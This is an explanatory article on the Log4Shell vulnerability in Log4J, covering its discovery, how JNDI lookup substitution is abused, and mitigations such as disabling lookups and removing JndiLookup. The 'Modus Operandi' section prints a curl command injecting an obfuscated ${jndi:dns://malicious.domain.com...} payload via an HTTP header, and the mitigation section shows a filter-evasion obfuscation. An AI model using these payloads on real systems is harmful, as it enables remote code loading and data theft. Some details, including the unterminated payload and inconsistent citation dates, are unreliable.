# About the Log4Shell vulnerability

<h2 style="display:none" id="top">(top)</h2>

![Log4Shell logo](https://i.nextmedia.com.au/News/log4shell.png)

## Introduction

The Log4Shell vulnerability ([CVE Record](https://www.cve.org/CVERecord?id=CVE-2021-44228)) was found by Chen Zhaojun, a member of Alibaba's security team, on the 24<sup>th</sup> of November, 2021. It affected devices using Log4J, a popular Java logging software. Due to the popularity of Log4J, Log4Shell was described by cybersecurity company Tenable as "the single biggest, most critical vulnerability ever", in part due to the vast array of devices vulnerable to the attack, with estimates saying that around 93% of enterprise cloud environments were vulnerable to attack. The vulnerability affected popular services and games, such as Amazon Web Services (AWS), Cloudflare, iCloud, *Minecraft: Java Edition*, Steam, Tencent QQ and many, many others.

## Modus Operandi

Log4Shell is an extememly easy to use vulnerability, because Log4J will perform string substutions on expressions like `${java:version}`, which, depending on the version of Java, may output with `Java version 1.7.0_6`. Among the many recognised substitutions, one is of the form `${jndi:<lookup>}`, which leverages Java's JNDI protocol, which gets and loads Java objects given a path at runtime. One such path can be `ldap://example.com/file`, which will retreive or send information on the internet, given a URL to a file or server. Hackers can then, utilising string substitution, gain access to environment variables or user data, putting that information in the query paramters of a URL, for the eventual sending of information to the hacker's server. But, because this method requires the user to type the string in, a common attack vector is to put the malicious string in a commonly logged HTTP header, such as the `User-Agent`, which, when a request is performed to a device, can enable the use of the vulnerability. Other potential protocols for sending information other than LDAP can be its secure variant, called LDAPS, Java's Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP). An full example use of Log4Shell has been written below:

`curl 127.0.0.1:8080 -H 'X-Api-Version: ${${lowercase:J}ndi:dns://malicious.domain.com/java_object.java?fullname=john_doe'`

## Mitigation

Initial methods of mitigating attacks utilising Log4Shell included blocking requests with potentially malicious content, such as the inclusion of `${jndi:` in a HTTP reuqest header. Although this had some affect, obfuscation of the malicious content can be used, such as `${${lowercase:j}${lowercase:n}${lowercase:d}${lowercase:i}:`, which performs the lowercase operation on each letter of `jndi`. These early mitigation techniques were not going to last long and weren't that effective, but until a business installed an update that removed the vulnerability, it was the best that was available. The first fixes were realeased on the 6<sup>th</sup> of December, 2021, in Log4J version 2.15.0-rc-1, which restricted the calls for lookup to only certain protocols and servers. But for some, it would be impossible to update to fixed versions, and so a fix had to be found that didn't involve an update. This was to remove `org.apache.logging.log4j.core.lookup.JndiLookup` from the classpath, or to set `log4j2.formatMsgNoLookups` to `true`. The former also worked against a related vulnerability, while the latter worked only for Log4Shell in most (but not all) cases. Newer versions of the Java Runtime Environment (JRE) also included fixes, such as blocking remoted code from being loaded by default, which, although it should've been implemented earlier, did not work against all attack vectors. When these options have not been possible, network traffic filtering has been the fallback mitigation technique, which is reccomended by NCC Group and the UK's National Cyber Security Centre.

## Extra Information & See Also

- [Inside the code: How the Log4Shell exploit works | Sophos](https://news.sophos.com/en-us/2021/12/17/inside-the-code-how-the-log4shell-exploit-works/)
- [Log4Shell Zero-day Exploit Walkthrough | Medium](https://medium.com/geekculture/log4shell-zero-day-exploit-walkthrough-f42352612ca6)

## Bibliography

- Wikimedia Foundation (15 March 2023) [Log4Shell](https://en.wikipedia.org/wiki/Log4Shell), Wikipedia, accessed 18 February 2023
- Rodriguez A (12 December 2021) [Log4Shell Zero-day Exploit Walkthrough](https://medium.com/geekculture/log4shell-zero-day-exploit-walkthrough-f42352612ca6), Medium, accessed 1 April 2023